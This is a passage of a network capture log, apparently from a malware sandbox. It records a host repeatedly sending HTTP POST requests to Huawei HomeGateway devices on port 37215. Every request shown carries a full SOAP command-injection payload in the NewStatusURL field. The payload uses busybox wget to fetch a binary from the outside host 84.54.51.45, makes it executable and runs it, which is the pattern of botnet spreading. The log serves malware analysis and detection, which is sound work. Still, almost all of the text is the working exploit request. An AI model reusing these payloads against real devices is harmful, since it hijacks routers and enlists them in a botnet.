                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2320192.168.2.155205441.56.192.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805109978 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2321192.168.2.154603041.96.46.25137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805141926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2322192.168.2.153737041.225.146.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805167913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2323192.168.2.154837641.201.5.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805205107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2324192.168.2.155802241.31.167.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805229902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2325192.168.2.153302441.153.236.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805753946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2326192.168.2.155341841.224.116.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805785894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2327192.168.2.154215041.15.243.10037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805809021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2328192.168.2.155262241.57.211.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.805841923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2329192.168.2.154078241.224.48.7337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806073904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
